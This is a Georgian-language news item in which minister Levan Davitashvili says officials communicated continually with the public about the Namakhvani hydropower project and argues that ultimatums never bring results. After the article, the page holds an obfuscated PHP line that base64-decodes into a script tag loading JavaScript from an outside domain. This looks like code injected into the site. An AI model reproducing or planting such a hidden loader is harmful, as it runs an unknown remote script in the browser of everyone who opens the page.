celsiusi
ავერსი საქკაბელი
გარემოს დაცვისა და სოფლის მეურნეობის მინისტრის, ლევან დავითაშვილის განცხადებით, „ნამახვანჰესთან“ დაკავშირებით კომპეტენტური პირები მუდმივად იყვნენ კომუნიკაციაში საზოგადოებასთან.
 
როგორც დავითაშვილი აცხადებს, „ნამახვანჰესის“ შესახებ კომუნიკაცია არსებობდა, მათ შორის, იყო ფორმალური და არაფორმალური შეხვედრაც. მისივე თქმით, აღნიშნულ საკითხზე ისაუბრეს პარლამენტში, საკომიტეტო მოსმენის დროს.
 
"ვფიქრობ, კომუნიკაცია, შესაძლოა, არ იყო სრულყოფილი. თავიდანვე ამაზე პრემიერ-მინისტრს ჰქონდა გაცხადება, როდესაც მინისტრებს სთოხვა ჩართულიყვნენ კომუნიკაციაში. მე ვიტყოდი, სხვადასხვა უწყების წარმომადგენელი, ის ადამიანი, ვისაც უშუალოდ ეხებოდა გადაწყვეტილების მიღება და კომპეტენტურია ამ საკითხში, მუდმივად იყო მოსახლოებასთნ კომუნიკაციაში. ეს არის როგორც ეკონომიკის, ისე ჩვენი სამინისტროს წარმომადგენელი ", - აღნიშნავს დავითაშვილი.
 
როგორც მინისტრი აღნიშნავს, ულტიმატუმის ენით საუაბრი შედეგის მომტანი არასდროს ყოფილა.
 
„ჩვენ სწორი ფორმატები უნდა გამოვიყენოთ ამ შემთხვევაში, ექნება დიალოგს აზრი და მივიღებთ შედეგს.
 
ჩვენ შეიძლება, ულტიმატუმის ენით ვისაუბროთ, მაგრამ შედეგის მომტანი ეს არასოდეს, არსად, არც ერთი მიმართულებით, არც ერთ საკითხთან დაკავშირებით არ ყოფილა, არა თუ კონკრეტულ ეკონომიკურ პროექტთან. არც ერთ პოლიტიკურ პროცესში ასეთი ტიპის ულტიმატუმებს შედეგი არ მოუტანია.
 
ჩვენ ვართ ამის მომსწრე, მათ შორის, უახლოეს წარსულში. გვესმის, რომ მხოლოდ დიალოგით ხდება გადაწყვეტილბის მიღება. უნდა დავსხდეთ და ერთმანეთს კონკრეტულ საკთხებზე უნდა ვესაუბროთ“, - აღნიშნავს დავითაშვილი.
1261
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");